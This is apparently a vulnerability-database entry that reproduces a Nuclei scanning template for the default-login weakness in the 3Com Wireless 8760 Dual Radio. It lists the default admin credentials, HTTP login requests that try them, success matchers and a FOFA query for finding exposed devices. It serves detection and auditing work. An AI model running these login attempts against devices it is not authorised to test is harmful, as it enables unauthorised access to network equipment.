3Com-wireless-default-login: 3Com Wireless 8760 Dual Radio - Default Login

日期: 2025-08-01 | 影响软件: 3Com Wireless 8760 Dual Radio | POC: 已公开

漏洞描述

3COM Wireless 8760 Dual Radio contains a default login vulnerability. Default admin login password 'password' was found.

PoC代码[已公开]

id: 3Com-wireless-default-login

info:
  name: 3Com Wireless 8760 Dual Radio - Default Login
  author: ritikchaddha
  severity: high
  description: |
    3COM Wireless 8760 Dual Radio contains a default login vulnerability. Default admin login password 'password' was found.
  reference:
    - https://www.speedguide.net/routers/3com-wl-546-3com-wireless-8760-dual-radio-11abg-1256
  metadata:
    max-request: 2
    fofa-query: "title=\"3COM\""
  tags: default-login,3com,vuln

http:
  - raw:
      - |
        POST /index.htm HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        userid={{username}}&passwd={{password}}&Submit=LOGIN

      - |
        POST /login.html HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&password={{password}}

    stop-at-first-match: true
    attack: pitchfork
    payloads:
      username:
        - admin
      password:
        - password

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'alt="Advanced Configuration"'
          - 'image/setup_wizard'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100b47ce01af846388be467dd94fd6a312521624bb283b97b1e49e7189323fa4afd022065037c23cd82aabdd7d1a194faa291f5afccea3d35b9ef969619ea3fa1aa801c:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/default-logins/3com/3Com-wireless-default-login.yaml